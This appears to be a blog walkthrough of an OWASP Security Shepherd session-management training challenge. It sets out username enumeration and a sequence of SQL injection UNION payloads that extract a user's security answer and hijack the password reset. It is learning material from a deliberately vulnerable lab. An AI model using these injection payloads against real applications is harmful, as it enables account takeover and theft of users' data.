OWASP Security Shepherd Project - Session Management Challenge 6 (Session Management Challenge)
Challenge
Solution
First, try admin / admin ->There is no a user named as admin!
Try root / root ->
User root exists! His/Her email address is elitehacker@shepherd.com.
Click Have you forgotten your password? link and input the root user's email ->
We don't know the Security Question answers...
Input apostrophe(') or quote(") to see if there exists a SQLi ->
There is a SQLi in email address field when using quote (")!
Input " UNION Select database();# -> BrokenAuthAndSessMangChalSix
Input " UNION Select table_name FROM information_schema.tables WHERE table_schema = "BrokenAuthAndSessMangChalSix -> Invalid Data Submitted: Invalid Email Address!
We notice that if the input is too long, then there will be a Invalid Data warning.
Input " UNION Select username from secret;# -> com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: SELECT command denied to user 'randomMoFoName'@'localhost' for table 'secret'
There is a secret table, but we have no right to access!!!
Input " UNION Select username from users;# -> manager
There exists a table "users" and it has a column "username" where the first element is "manager"!
Input " UNION Select username from users WHERE username="root";# -> root
Input " UNION Select password from users WHERE username="root";# -> com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: Unknown column 'password' in 'field list'
There is no 'password' column exists in 'users' table.
Input " UNION Select secretanswer from users WHERE username="root";# -> Deerburn Hotel
We get the answer of Secret question of user root!
Use it for forget password feature ->
留言
張貼留言
Welcome to share your comments or questions : -)
Enjoy life!